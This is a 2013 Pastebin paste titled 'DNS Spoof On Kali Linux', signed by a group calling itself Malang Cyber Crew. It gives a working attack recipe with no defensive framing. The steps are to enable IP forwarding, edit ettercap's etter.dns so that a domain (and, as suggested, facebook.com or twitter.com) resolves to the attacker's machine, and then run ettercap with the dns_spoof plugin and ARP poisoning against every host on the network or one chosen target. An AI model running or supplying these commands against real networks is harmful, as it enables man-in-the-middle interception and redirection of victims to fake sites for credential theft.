Advertisement
Mr_Doel

DNS Spoof On Kali Linux

Oct 29th, 2013
933
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.98 KB | None | 0 0
  1. | \/ |_ __ | _ \ ___ ___| |
  2. | |\/| | '__| | | | |/ _ \ / _ \ |
  3. | | | | | | |_| | (_) | __/ |
  4. |_| |_|_| |____/ \___/ \___|_|
  5.  
  6. echo 1 > /proc/sys/net/ipv4/ip_forward
  7.  
  8. Check it :
  9. cat /proc/sys/net/ipv4/ip_forward
  10.  
  11. My IP >> 192.168.0.101
  12.  
  13. Target IP >> 192.168.0.100
  14. We can use NMAP or other tool to scan IP
  15.  
  16. Now, edit etter.dns at /etc/ettercap/etter.dns
  17.  
  18. kaplik.com A 192.168.0.101
  19. *.kaplik.com A 192.168.0.101
  20. www.kaplik.com PTR 192.168.0.101
  21.  
  22. it means that kaplik.com will redirect to my localhost 192.168.0.101
  23.  
  24.  
  25. you can change it like facebook.com twitter.com etc
  26.  
  27. Now we start to spoof . . .
  28.  
  29. Using ettercap plugin "dns_spoof"
  30. ettercap -T -q -i <interface> -P <plugin> -M arp // //
  31.  
  32. Ex :
  33.  
  34. Spoof all IP :
  35. $ ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
  36.  
  37. Spoof specified IP and then all IP :
  38. $ ettercap -T -q -i wlan0 -P dns_spoof -M arp /192.168.0.100/ //
  39.  
  40. -----Malang Cyber Crew----
  41. -----http://mc-crew.org---
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement